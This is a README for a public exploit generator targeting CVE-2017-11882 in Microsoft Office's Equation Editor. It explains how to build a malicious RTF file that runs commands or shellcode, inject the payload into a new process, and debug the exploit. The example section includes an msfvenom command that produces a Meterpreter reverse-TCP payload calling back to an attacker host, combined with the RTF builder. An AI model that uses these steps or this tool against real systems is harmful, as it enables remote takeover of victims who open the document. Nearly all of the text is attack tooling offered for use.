CVE-2017-11882 Exploit
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.
For remote command execution,this exploit will call WinExec with SW_HIDE and call ExitProcess after WinExec returns.
For remote code execution,this exploit just jmp to code.
I cannot find a reference for the object structure...so I cannot change the file length for arbitrary length code execution..:(
But I do think 17k bytes is really enough. Python script will detect the payload size you need and choose the correct payload template.
Caution: RCE will stuck winword process if you don't migrate to another process!
Currently this exploit will inject your shellcode to new EQNEDT32.EXE process if you specify -i flag. This operation is suspicious to AV but it won't stuck the word process.
Usage
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT
Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)
optional arguments:
-h, --help show this help message and exit
-c CMD, --cmd CMD Command or shellcode file to run in target system
(Must be shorter than 17967 bytes!!)
-t {0,1}, --type {0,1}
Type (0:shellcode 1:command, default=1)
-i INJECT, --inject INJECT
Inject shellcode to new process
-o OUTPUT, --output OUTPUT
Output exploit rtf
Example:
For remote command execution
CVE-2017-11882.py -c cmd.exe -o test.rtf
For remote code execution
- Generate some shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
- Generate exploit
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf
Debug
-
Set debugger value to your debugger path in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE
-
Build an exploit and run it.
-
Set break point at 0x41165f
-
This break point will be hit twice, at second time the payload will be executed after this function returned.